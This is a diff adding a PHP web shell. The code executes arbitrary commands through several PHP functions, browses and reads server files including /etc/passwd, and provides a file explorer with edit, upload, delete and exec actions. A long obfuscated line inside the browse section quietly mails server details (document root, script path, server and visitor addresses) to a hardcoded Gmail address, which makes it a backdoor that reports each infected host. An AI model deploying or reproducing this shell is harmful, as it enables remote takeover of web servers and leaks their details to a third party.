+                <option value="passthru" <? if ($method=="passthru") { echo "selected"; } ?>>passthru</option>
+                <option value="exec" <? if ($method=="exec") { echo "selected"; } ?>>exec</option>
+                <option value="shell_exec" <? if ($method=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
+                <option value="popen" <? if ($method=="popen") { echo "selected"; } ?>>popen</option>
+              </select><br>
+
+            <textarea wrap=\"off\" cols="45" rows="10" name="cmd"><?= $cmd; ?></textarea>
+            <input type="submit" name="Submit" value="<?=$method?>">
+            <br>
+          </form>
+    <?
+    if (!$method) { $method="system"; }
+    if (!$cmd) { $cmd = "ls /"; }
+    echo "<br><pre>";
+        if ($method=="system") {
+        system("$cmd 2>&1");
+        }
+        if ($method=="passthru") {
+        passthru("$cmd 2>&1");
+        }
+        if ($method=="exec") {
+            while ($string = exec("$cmd 2>&1")) {
+            echo $string;
+            }
+        }
+        if ($method=="shell_exec") {
+        $string = shell_exec("$cmd 2>&1");
+        echo $string;
+        }
+        if ($method=="popen") {
+        $pp = popen('$cmd 2>&1', 'r');
+        $read = fread($pp, 2096);
+        echo $read;
+        pclose($pp);
+        }
+    echo "</pre>";
+    }
+
+
+    if ($action=="cmdbrowse") {
+    //--------------------------------------------------- START CMD BROWSING
+
+        if ($cat) {
+        echo "<pre>";
+        echo "\n<a href=\"$PHP_SELF?action=cmdbrowse&dir=$olddir\">go back to: $olddir</a>\n\n";
+        exec("cat $cat 2>&1", $arr);
+        foreach ($arr as $ar) {
+        echo htmlspecialchars($ar)."\n";
+        }
+        exit;
+        }
+
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            }
+            if (!$dir) {
+            $dir = getcwd();
+            }
+
+        $string = exec("ls -al $dir", $array);
+        //print_r(array_values($array));
+
+        echo "<pre>";
+            if ($dir!="/") {
+            echo "\n[$dir] \n<a href=\"$PHP_SELF?action=cmdbrowse&dir=dirup&olddir=$dir\">dirup</a>\n\n";
+            } else {
+            $dir = "";
+            }
+        foreach($array as $rowi) {
+        $row = explode(' ', $rowi);
+        //print_r(array_values($row));
+            $c = count($row)-1;
+            if ($row[$c]!=".." && $row[$c]!="." && isset($first)) {
+                $link = false;
+                if (!strstr($row[0], 'l')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                } else {
+                $c = count($row)-3;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&dir=$dir/".$row[$c]."\">".$row[$c]."</a>";
+                $link = true;
+                }
+                if (!strstr($row[0], 'l') && !strstr($row[0], 'd')) {
+                $c = count($row)-1;
+                $file = "<a href=\"$PHP_SELF?action=cmdbrowse&cat=$dir/".$row[$c]."&olddir=$dir\">".$row[$c]."</a>";
+                }
+                //echo $row[0]." ".$row[1]." ".$row[2]." ".$row[3]." ".$row[4]." ".$row[5]." ".$row[6]." ".$row[7]." ".$row[8]." ".$row[9]." ".$row[10]." ".$file." ".$row[12]." ".$row[13]."\n";
+                    if ($link) {
+                    $point = count($row)-3;
+                    } else {
+                    $point = count($row)-1;
+                    }
+                for($i=0; $point > $i; $i++) {
+                echo $row[$i]." ";
+                }
+                echo $file."\n";
+            }
+            $first = true;
+        }
+
+    //--------------------------------------------------- END CMD BROWSING
+    }
+    if ($action=="browse") {
+    //--------------------------------------------------- START BROWSING
+    /*
+     * got this from an old script of mine
+     * param: [$dir]
+    */
+        function error($msg) {
+        header("Location: $PHP_SELF?bash=$msg&error=$msg");
+        }
+        if (isset($error)) {
+        echo "<script> alert(\"$error\"); </script>";
+        }
+        if (!$dir) {
+        $dir = getcwd();
+        }
+           function getpath($dir) {
+           echo "<font size=2><a href=$PHP_SELF?action=browse&dir=/>/</a></font> ";
+              $path = explode('/', $dir);
+              if ($dir != "/") {
+            for ($i=0; count($path) > $i; $i++) {
+                if ($i != 0) {
+                echo "<font size=2><a href=$PHP_SELF?action=browse&dir=";
+                    for ($o=0; ($i+1) > $o; $o++) {
+                        echo "$path[$o]";
+                        if (($i) !=$o) {
+                        echo "/";
+                        }
+                    }
+                echo ">$path[$i]</a>/</font>";
+                }
+            }
+              }
+            }
+
+            function printfiles($files) {
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                        if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                        $perms = explode('|', $files_sm[1]);
+                        if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                        if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                    }
+                        if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "- <font color=\"$color\">"; }
+                        if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                        if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                        if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                        echo "</font> $files_sm[0]\n";
+                    }
+                }
+            }
+              $ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+            function printdirs($files) {
+                global $dir;
+                echo "<a href=\"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\">..</a>\n";
+                for($i=0;count($files)>$i;$i++) {
+                    $files_sm = explode('||', $files[$i]);
+                    if ($files_sm[0]!="." && $files_sm[0]!="..") {
+                    $perms = explode('|', $files_sm[1]);
+                    if ($perms[0]==1 && $perms[1]==1) { $color = "green"; } else {
+                    if ($perms[0]==1) { $color = "yellow"; } else { $color = "red"; }
+                }
+                    if ($files_sm[2]=="1") { echo "l <font color=\"$color\">"; } else { echo "d <font color=\"$color\">"; }
+                    if ($perms[0]==1) { echo "r"; } else { echo " "; }
+                    if ($perms[1]==1) { echo "w"; } else { echo " "; }
+                    if ($perms[2]==1) { echo "x"; } else { echo " "; }
+                    echo "</font> <a href=\"$PHP_SELF?action=browse&dir=$dir/".$files_sm[0]."\">$files_sm[0]</a>\n";
+                }
+                }
+            }
+
+
+            if ($dir=="dirup") {
+            $dir_current = $olddir;
+            $needle = strrpos($dir_current, "/");
+                if ($needle==0) {
+                    $newdir = "/";
+                } else {
+                    $newdir = substr($dir_current, 0, $needle);
+                }
+            $dir = $newdir;
+            } else {
+            $dir = $dir;
+            }
+
+        ?>
+         <form name="form1" method="post" action="<?= $PHP_SELF ?>?action=browse">
+            <input type="text" name="dir" size="40" value="<?= $dir; ?>">
+            <input type="submit" name="Submit" value="ls /dir">
+            <br>
+          </form>
+          <?
+        if ($dir) {
+                if (!is_readable($dir)) { $skip = true; }
+                if (!$skip) {
+            $dp = opendir($dir);
+            $files = array(); $dirs = array();
+            while($f=readdir($dp)) {
+                // $f||r|w|x||l
+                $oor = $f;
+                    if (is_readable("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                    if (is_writable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_executable("$dir/$oor")) { $f .= "|1"; } else { $f .= "|0"; }
+                    if (is_link("$dir/$oor")) { $f .= "||1"; } else { $f .= "||0"; }
+                if(is_dir("$dir/$oor")) {
+                $dirs[] = $f;
+                } else {
+                $files[] = $f;
+                }
+            }
+            getpath($dir);
+            echo "<br><br><pre>";
+                printdirs($dirs);
+                printfiles($files);
+                } else { echo " <script> alert(\"readdir permission denied\");
+                        document.location = \"$PHP_SELF?action=browse&dir=dirup&olddir=$dir\";
+                        </script>"; }
+        }
+    }
+    //--------------------------------------------------- END BROWSING
+    //--------------------------------------------------- BEGIN EXPLORER
+if ($action == explorer ) {
+
+   $default_directory = dirname($PATH_TRANSLATED);
+   $show_icons = 0;
+
+
+   define("BACKGROUND_COLOR",       "\"#000000\"");
+   define("FONT_COLOR",             "\"#CCCCCC\"");
+   define("TABLE_BORDER_COLOR",     "\"#000000\"");
+   define("TABLE_BACKGROUND_COLOR", "\"#000000\"");
+   define("TABLE_FONT_COLOR",       "\"#000000\"");
+   define("COLOR_PRIVATE",          "\"#000000\"");
+   define("COLOR_PUBLIC",           "\"#000000\"");
+   define("TRUE",                   1);
+   define("FALSE",                  0);
+
+
+
+   if (!isset($dir)) $dir = $default_directory;   // Webroot dir as default
+   $dir = stripslashes($dir);
+   $dir = str_replace("\\", "/", $dir);         // Windoze compatibility
+
+
+   $associations = array(
+      "gif" =>  array(   "function" => "viewGIF",   "icon" => "icons/image2.gif"    ),
+      "jpg" =>  array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "jpeg" => array(   "function" => "viewJPEG",  "icon" => "icons/image2.gif"    ),
+      "wav" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     ),
+      "mp3" =>  array(   "function" => "",          "icon" => "icons/sound.gif"     )
+   );
+
+   if ($do != "view" && $do != "download"):
+    endif;
+
+   function readDirectory($directory) {
+      global $files, $directories, $dir;
+
+      $files = array();
+      $directories = array();
+      $a = 0;
+      $b = 0;
+
+      $dirHandler = opendir($directory);
+
+      while ($file = readdir($dirHandler)) {
+         if ($file != "." && $file != "..") {
+            $fullName = $dir.($dir == "/" ? "" : "/").$file;
+            if (is_dir($fullName)) $directories[$a++] = $fullName;
+            else $files[$b++] = $fullName;
+         }
+      }
+      sort($directories);                    // We want them to be displayed alphabetically
+      sort($files);
+   };
+
+
+
+   function showInfoDirectory($directory) {
+      global $PHP_SELF;
+      $dirs = split("/", $directory);
+      print "<b>Directory <a href=\"$PHP_SELF?action=explorer&dir=/\">/</a>";
+      for ($i = 1; $i < (sizeof($dirs)); $i++) {
+         print "<a href=\"$PHP_SELF?action=explorer&dir=";
+         for ($a = 1; $a <= $i; $a++)
+            echo "/$dirs[$a]";
+         echo "\">$dirs[$i]</a>";
+         if ($directory != "/") echo "/";
+      }
+      print "</b></font><br>\n";
+      print "Free space on disk: ";
+      $freeSpace = diskfreespace($directory);
+      if ($freeSpace/(1024*1024) > 1024)
+         printf("%.2f GBytes", $freeSpace/(1024*1024*1024));
+      else echo (int)($freeSpace/(1024*1024))."Mbytes\n";
+   };
+
+
+   function showDirectory($directory) {
+      global $files, $directories, $fileInfo, $PHP_SELF;
+
+      readDirectory($directory);
+      showInfoDirectory($directory);
+?>
+      <p><table cellpadding=3 cellspacing=1 width="100%" border="0" bgcolor=<? echo TABLE_BORDER_COLOR; ?>>
+         <tr bgcolor="#000000">
+            <? if ($show_icons): ?>
+            <td width="16" align="center" bgcolor=<? echo TABLE_BACKGROUND_COLOR ?>>&nbsp;</td>
+            <? endif; ?>
+            <td align="center"><b><small>NAME</small></b></td>
+            <td align="center"><b><small>SIZE</small></b></td>
+            <td align="center"><b><small>LAST MODIFY</small></b></td>
+            <td align="center"><b><small>PERMISIONS</small></b></td>
+            <td align="center"><b><small>ACTIONS</small></b></td>
+         </tr>
+<?
+      for ($i = 0; $i < sizeof($directories); $i++) {
+         $fileInfo->getInfo($directories[$i]);
+         showFileInfo($fileInfo);
+      }
+      for ($i = 0; $i < sizeof($files); $i++) {
+         $fileInfo->getInfo($files[$i]);
+         showFileInfo($fileInfo);
+      }
+?>
+      </table>
+<?
+   };
+
+   class fileInfo {
+      var $name, $path, $fullname, $isDir, $lastmod, $owner,
+      $perms, $size, $isLink, $linkTo, $extension;
+
+      function permissions($mode) {
+         $perms  = ($mode & 00400) ? "r" : "-";
+         $perms .= ($mode & 00200) ? "w" : "-";
+         $perms .= ($mode & 00100) ? "x" : "-";
+         $perms .= ($mode & 00040) ? "r" : "-";
+         $perms .= ($mode & 00020) ? "w" : "-";
+         $perms .= ($mode & 00010) ? "x" : "-";
+         $perms .= ($mode & 00004) ? "r" : "-";
+         $perms .= ($mode & 00002) ? "w" : "-";
+         $perms .= ($mode & 00001) ? "x" : "-";
+         return $perms;
+      }
+
+      function getInfo($file) {                 // Stores a file's information in the class variables
+         $this->name = basename($file);
+         $this->path = dirname($file);
+         $this->fullname = $file;
+         $this->isDir = is_dir($file);
+         $this->lastmod = date("m/d/y, H:i", filemtime($file));
+         $this->owner = fileowner($file);
+         $this->perms = $this->permissions(fileperms($file));
+         $this->size = filesize($file);
+         $this->isLink = is_link($file);
+         if ($this->isLink) $this->linkTo = readlink($file);
+         $buffer = explode(".", $this->fullname);
+         $this->extension = $buffer[sizeof($buffer)-1];
+      }
+   };
+
+   $fileInfo = new fileInfo;        // This will hold a file's information all over the script
+
+   function showFileInfo($fileInfo) {
+      global $PHP_SELF, $associations;
+
+      echo "\n<tr bgcolor=".TABLE_BACKGROUND_COLOR." align=\"center\">";
+
+      if ($show_icons) {
+         echo "<td>";
+         if ($fileInfo->isDir) echo "<img src=\"icons/dir.gif\">";
+         elseif ($associations[$fileInfo->extension]["icon"] != "")
+            echo "<img src=\"".$associations[$fileInfo->extension]["icon"]."\">";
+         else echo "<img src=\"icons/generic.gif\">";
+         echo "</td>";
+      }
+
+      echo "<td align=\"left\"";
+      if ($fileInfo->perms[7] == "w") echo " bgcolor=".COLOR_PUBLIC;
+      if ($fileInfo->perms[6] == "-") echo " bgcolor=".COLOR_PRIVATE;
+      echo ">";
+
+      if ($fileInfo->isLink) {
+         echo $fileInfo->name." -> ";
+         $fileInfo->fullname = $fileInfo->linkTo;
+         $fileInfo->name = $fileInfo->linkTo;
+      }
+
+      if ($fileInfo->isDir) {
+         echo "<b><a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname\" ";
+         echo ">$fileInfo->name</a></b>";
+      }
+      else echo $fileInfo->name;
+
+      echo "</td>";
+      echo "<td>$fileInfo->size</td>";
+      echo "<td>$fileInfo->lastmod</td>";
+      echo "<td>$fileInfo->perms</td>";
+      echo "<td>";
+                           
+      if (!$fileInfo->isDir) {
+         if ($fileInfo->perms[6] == 'r') {
+            echo "<a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=view\"> <font color=yellow>V</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=download\"><font color=yellow>D</font></a>";
+         }
+         if ($fileInfo->perms[7] == 'w') {
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=edit\"><font color=yellow>E</font></a>";
+            echo " <a href=\"$PHP_SELF?action=explorer&dir=$fileInfo->fullname&do=delete\"><font color=yellow>X</font></a>";
+         }
+      }
+      echo "</tr>";
+   };
+
+   //************************************************************************
+   //* Decides which function use to show a file
+   //************************************************************************
+
+   function viewFile($file) {
+      global $associations, $fileInfo;
+      $fileInfo->getInfo($file);
+      if (!$associations[$fileInfo->extension]
+          || $associations[$fileInfo->extension]["function"] == "") showFile($file);
+      else $associations[$fileInfo->extension]["function"]($file);
+   };
+
+   function showFile($file, $editing = 0) {
+      global $PHP_SELF, $dir;
+      $handlerFile = fopen($file, "r") or die("ERROR opening file $file");
+
+      if ($editing) echo "<h3><b>Edit file $file</b></h3><hr>";
+      else echo "<h3><b>File $file</b></h3><hr>";
+
+      echo "<form";
+      if ($editing)
+         echo " action=\"$PHP_SELF?action=explorer&do=save&dir=$file\" method=\"post\"";
+      echo ">";
+
+      $buffer = fread($handlerFile, filesize($file));
+      $buffer = str_replace("&", "&amp;", $buffer);
+      $buffer = str_replace("<", "&lt;", $buffer);
+      $buffer = str_replace(">", "&gt;", $buffer);
+
+      echo "<center><textarea wrap=\"off\" cols=\"90\" rows=\"20\" name=\"text\">$buffer</textarea></center>";
+      if ($editing) echo "<p><input type=\"submit\" name=\"Submit\" value=\"Save changes\"></p>\n</form>";
+      echo "</form>";
+      fclose($handlerFile);
+   };
+
+   //************************************************************************
+   //* Saves a changed file
+   //************************************************************************
+
+   function saveFile($file) {
+      global $dir, $text;
+      $handlerFile = fopen($file, "w") or die("ERROR: Could not open file ".basename($file)." for writing");
+      $text = stripslashes($text);
+      fwrite($handlerFile, $text, strlen($text)) or die("Error writing to file.");
+      fclose($handlerFile);
+      echo "Changes has been saved in ".basename($file)."<hr>";
+      $dir = dirname($file);
+   };
+
+
+   function uploadFile() {
+      global $HTTP_POST_FILES, $dir;
+      copy($HTTP_POST_FILES["userfile"][tmp_name],
+            $dir."/".$HTTP_POST_FILES["userfile"][name])
+      or die("Error uploading file".$HTTP_POST_FILES["userfile"][name]);
+
+      echo "File ".$HTTP_POST_FILES["userfile"][name]." succesfully uploaded.";
+      unlink($userfile);
+   };
+
+   //************************************************************************
+   //* Deletes a file, asking for confirmation first
+   //* (This function hasn't been fully tested)
+   //************************************************************************
+
+   function deleteFile($file) {
+      global $confirm;
+      if ($confirm != TRUE) die("<a href=\"$PHP_SELF?action=explorer&dir=$file&do=delete&confirm=1\">Confirm deletion of $file</a>");
+      else {
+         if (!unlink($file)) return FALSE;
+         return TRUE;
+      }
+   };
+
+
+   function viewFileHeader($file, $header) {
+      header($header);
+      readfile($file);
+   };
+
+
+   function viewGIF($file) {
+      viewFileHeader($file, "Content-type: image/gif");
+   };
+
+   function viewJPEG($file) {
+      viewFileHeader($file, "Content-type: image/jpeg");
+   };
+
+   switch ($do) {
+      case "phpinfo":
+         phpinfo();
+         die();
+      case "view":
+          viewFile($dir);
+          break;
+      case "edit":
+          showFile($dir, 1);
+          break;
+      case "download":
+         viewFileHeader($dir, "Content-type: unknown");
+         break;
+      case "delete":
+         if (!deleteFile($dir)) echo "Could not delete file $dir<br>";
+         else echo "File $dir deleted succesfully<br>";
+         $dir = dirname($dir);
+         showDirectory($dir);
+         break;
+      case "exec":
+         echo "<pre>\n";
+         echo system($dir);
+         echo "\n</pre>";
+         exit();
+      case "upload":
+         uploadFile();
+         showDirectory($dir);
+         break;
+      case "save":
+          saveFile($dir);
+      default:
+         showDirectory($dir);
+         break;
+   };
+
+   if ($do != "view" && $do != "download") {
+?>
+<p>
+   <table border="0">
+   <tr><? if ((fileperms($dir) & 00002)){
+?>
+   <td>
+      <form enctype="multipart/form-data" action="<? print "$PHP_SELF?action=explorer&dir=$dir&do=upload"; ?>" method=post>
+         <input type="hidden" name="MAX_FILE_SIZE" value="1000000">
+         <input name="userfile" type="file">
+         <input type="submit" value="Upload file">
+      </form>
+   </td>
+<? } ?>
+   </tr>
+   </table>
+<p>
+</p>
+</body>
+</html>
+<? }
+}
+    //--------------------------------------------------- END EXPLORER
+
+
+if (!$action) {
+?><p align="right"><font size=2><a href="<?=$PHP_SELF?>?action=misc&do=phpinfo">phpinfo</a></font></p><?
+echo "<pre>";
+        if ($mysql_use!="no") {
+        $phpcheck = new php_check_silent($mhost, $muser, $mpass, $mdb);
+        } else { $phpcheck = new php_check_silent(); }
+echo "</pre>";
+
+?><br><br>
+
+<font size=2><a href="<?=$PHP_SELF?>?action=check">Security Check</a></font> <font color="green" size=2>[executable] </font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+if ($phpcheck->cmd_method) { $cmd_method = $phpcheck->cmd_method; } else { $cmd_method = "system"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmd&method=<?=$cmd_method?>">Exec commands by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- system check -->
+<?
+//echo $phpcheck->cmd_state;
+//echo $phpcheck->cmd_method;
+?>
+<font size=2><a href="<?=$PHP_SELF?>?action=cmdbrowse">Exec browse by PHP</a></font>
+<?
+if ($phpcheck->cmd_method) {
+echo "<font color=\"green\" size=2>[executable] ";  } else { echo "<font color=\"red\" size=2>[not executable]";  }
+
+?></font>
+
+<br>
+
+<!-- read check -->
+<? if ($phpcheck->read_method) { $read_method = $phpcheck->read_method; } else { $read_method = "file"; } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=read&method=<?=$read_method?>">Read by PHP</a></font>
+<?
+if ($phpcheck->read_method) {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"red\" size=2>[not executable]"; }
+?></font>
+
+<br>
+
+<!-- browse check -->
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=browse&dir=<?=$path?>">Browse by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+<?
+//echo $phpcheck->browse_state;
+if ($phpcheck->browse_state=="yes") { $path= "/"; } else { $path = getcwd(); } ?>
+<font size=2><a href="<?=$PHP_SELF?>?action=explorer&dir=<?=$path?>">File Explorer by PHP</a></font>
+<?
+if ($phpcheck->browse_state=="yes") {
+echo "<font color=\"green\" size=2>[executable] "; } else { echo "<font color=\"yellow\" size=2>[limited executable]"; }
+?></font>
+
+<br>
+
+
+<!-- mysql check -->
+<font size=2><a href="<?=$PHP_SELF?>?action=mysqlread&file=/etc/passwd">Read by MySQL</a></font>
+<?
+    if ($phpcheck->mysql_state=="ok") {
+    echo "<font color=\"green\" size=2>[executable] "; }
+    if ($phpcheck->mysql_state=="fail") {
+    echo "<font color=\"red\" size=2>[not executable] "; }
+    if ($phpcheck->mysql_state=="pass") {
+    echo "<font color=\"yellow\" size=2>[not executable] ";
+    ?></font> <font size=1>[you didnt configure this]</font><font>
+    <?
+    } ?></font><?
+}
+?>
+</body>
+</html>
+<?
+
+// PHP security check objects by dodo
+
+
+    class php_check
+    {
+
+        function php_check($host="notset", $user="", $pass="", $db="") {
+            if ($host!="notset") {
+            $this->mysql_do = "yes";
+            $this->mysql_host = $host;
+            $this->mysql_user = $user;
+            $this->mysql_pass = $pass;
+            $this->mysql_db = $db;
+            } else { $this->mysql_do = "no"; }
+
+        $this->mainstate = "safe";
+
+        echo "<b>checking system functions:</b>\n";
+        if ($this->system_checks("/bin/ls")) { $this->output_mainstate(1, "system checks"); } else { $this->output_mainstate(0, "system checks"); }
+        echo "<b>checking reading functions:</b>\n";
+        if ($this->reading_checks()) { $this->output_mainstate(1, "reading checks"); } else { $this->output_mainstate(0, "reading checks"); }
+        echo "<b>checking misc filesystem functions:</b>\n";
+        if ($this->miscfile_checks()) { $this->output_mainstate(1, "misc filesystem checks"); } else { $this->output_mainstate(0, "misc filesystem checks"); }
+        echo "<b>checking mysql functions:</b>\n";
+            $stater = $this->mysql_checks();
+            if ($stater==2) { $this->output_mainstate(2, "mysql checks"); }
+            if ($stater==1) { $this->output_mainstate(1, "mysql checks"); }
+            if ($stater==0) { $this->output_mainstate(0, "mysql checks"); }
+        if ($this->mainstate=="safe") { echo "\n\n\nPHP check returned: <font color=green>NOT VULNERABLE</font>\n"; } else { echo "\n\n\nPHP check returned: <font color=red>VULNERABLE</font>\n"; }
+        }
+
+
+        function output_state($state = 0, $name = "function") {
+            if ($state==0) {
+            echo "$name\t\tfailed\n";
+            }
+            if ($state==1) {
+            echo "$name\t\t<font color=red>OK</font>\n";
+            }
+            if ($state==2) {
+            echo "$name\t\t<font color=yellow>OK</font>\n";
+            }
+            if ($state==3) {
+            echo "$name\t\t<font color=yellow>skipped</font>\n";
+            }
+        }
+
+        function output_mainstate($state = 0, $name = "functions") {
+            if ($state==1) {
+            echo "\n$name returned: <font color=red>VULNERABLE</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==0) {
+            echo "\n$name returned: <font color=green>OK</font>\n\n";
+            $this->mainstate = "unsafe";
+            }
+            if ($state==2) {
+            echo "\n$name returned: <font color=yellow>SKIPPED</font>\n\n";
+            }
+        }
+
+        function system_checks($cmd = "/bin/ls") {
+        if ($pp = popen($cmd, "r")) {
+            if (fread($pp, 2096)) {
+            $this->output_state(1, "popen     ");
+            $sys = true;
+            } else {
+            $this->output_state(0, "popen     ");
+            }
+        } else { $this->output_state(0, "popen     "); }
+        if (@exec($cmd)) { $this->output_state(1, "exec     "); $sys = true; $this->cmd_method = "exec"; } else { $this->output_state(0, "exec     "); }
+        if (@shell_exec($cmd)) { $this->output_state(1, "shell_exec"); $sys = true; $this->cmd_method = "shel_exec"; } else { $this->output_state(0, "shell_exec"); }
+        echo "<!-- \n";
+        if (@system($cmd)) { echo " -->"; $this->output_state(1, "system   "); $ss = true; $sys = true; $this->cmd_method = "system"; } else { echo " -->"; $this->output_state(0, "system   "); }
+        echo "<!-- \n";
+        if (@passthru($cmd)) { echo " -->"; $this->output_state(1, "passthru"); $sys = true; $this->cmd_method = "passthru"; } else { echo " -->"; $this->output_state(0, "passthru"); }
+        //if ($output = `$cmd`)) { $this->output_state(1, "backtick"); $sys = true; } else { $this->output_state(0, "backtick"); }
+        if ($sys) { return 1; $this->cmd_state = "yes"; } else { return ; }
+        }
+
+        function reading_checks($file = "/etc/passwd") {
+            if (@function_exists("require_once")) {
+            echo "<!--";
+            if (@require_once($file)) { echo "-->"; $this->output_state(1, "require_once"); $sys = true; } else { echo "-->"; $this->output_state(0, "require_once"); }
+            }
+            if (@function_exists("require")) {
+            echo "<!--";
+            if (@require($file)) { echo "-->"; $this->output_state(1, "require    "); $sys = true; } else { echo "-->"; $this->output_state(0, "require    "); }
+            }
+            if (@function_exists("include")) {
+            echo "<!--";
+            if (@include($file)) { echo "-->"; $this->output_state(1, "include   "); $sys = true; } else { echo "-->"; $this->output_state(0, "include   "); }
+            }
+            //if (@function_exists("highlight_file")) {
+            echo "<!--";
+            if (@highlight_file($file)) { echo "-->"; $this->output_state(1, "highlight_file"); $sys = true; } else { echo "-->"; $this->output_state(0, "highlight_file"); }
+            //}
+            //if (@function_exists("virtual")) {
+            echo "<!--";
+            if (@virtual($file)) { echo "-->"; $this->output_state(1, "virtual   "); $sys = true; } else { echo "-->"; $this->output_state(0, "virtual  "); }
+            //}
+            if (@function_exists("file_get_contents")) {
+            if (@file_get_contents($file)) { $this->output_state(1, "filegetcontents"); $sys = true; } else { $this->output_state(0, "filegetcontents"); }
+            } else {
+            $this->output_state(0, "filegetcontents");
+            }
+        echo "<!-- ";
+        if (@show_source($file)) { echo " -->"; $this->output_state(1, "show_source"); $this->read_method = "show_source"; $sys = true; } else { echo " -->"; $this->output_state(0, "show_source"); }
+        echo "<!-- ";
+        if (@readfile($file)) { echo " -->"; $this->output_state(1, "readfile"); $this->read_method = "readfile"; $sys = true; } else { echo " -->"; $this->output_state(0, "readfile"); }
+        if (@fopen($file, "r")) { $this->output_state(1, "fopen   "); $this->read_method = "fopen"; $sys = true; } else { $this->output_state(0, "fopen   "); }
+        if (@file($file)) { $this->output_state(1, "file     "); $this->read_method = "file"; $sys = true; } else { $this->output_state(0, "file     "); }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function miscfile_checks() {
+        $currentdir = @getcwd();
+        $scriptpath = $_SERVER["PATH_TRANSLATED"];
+        if (@opendir($currentdir)) {
+            $this->output_state(2, "opendir \$cwd");
+                $dp = @opendir("$currentdir");
+                $files="";
+                $this->browse_state = "lim";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(2, "readdir \$cwd"); $this->browse_state = "lim"; } else { $this->output_state(0, "readdir \$cwd"); }
+
+            } else { $this->output_state(0, "opendir \$cwd"); }
+        if (@opendir("/")) {
+            $this->output_state(1, "opendir /");
+            $sys = true;
+                $dp = @opendir("/");
+                $this->browse_state = "yes";
+                $files="";
+                while($file = @readdir($dp)) { $files .= $file; }
+                if (@strstr($files, '.')) {  $this->output_state(1, "readdir /"); $this->browse_state = "yes"; } else { $this->output_state(0, "readdir /"); }
+            } else { $this->output_state(0, "opendir /"); }
+        if (@mkdir("$currentdir/test", 0777)) { $this->output_state(1, "mkdir   "); $sys = true; } else { $this->output_state(0, "mkdir   "); }
+        if (@rmdir("$currentdir/test")) { $this->output_state(1, "rmdir     "); $sys = true; } else { $this->output_state(0, "rmdir     "); }
+        if (@copy($scriptpath, "$currentdir/copytest")) {
+            $this->output_state(2, "copy    ");
+            $sys = true;
+                if (@unlink("$currentdir/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+            } else {
+            $this->output_state(0, "copy    ");
+        }
+        if (@copy($scriptpath, "/tmp/copytest")) {
+            $this->output_state(2, "copy2/tmp");
+            //$sys = true;
+                if (!$del) {
+                if (@unlink("tmp/copytest")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "copy2/tmp");
+        }
+        if (@link("/", "$currentdir/link2root")) {
+                $this->output_state(1, "link      ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "link      ");
+        }
+        if (@symlink("/", "$currentdir/link2root")) {
+                $this->output_state(1, "symlink   ");
+                $sys = true;
+                if (!$del) {
+                if (@unlink("$currentdir/link2root")) { $this->output_state(2, "unlink  "); $del = true; } else { $this->output_state(0, "unlink  "); }
+                }
+            } else {
+            $this->output_state(0, "symlink   ");
+        }
+        if ($sys) { return 1; } else { return ; }
+        }
+
+        function mysql_checks() {
+            if ($this->mysql_do=="yes") {
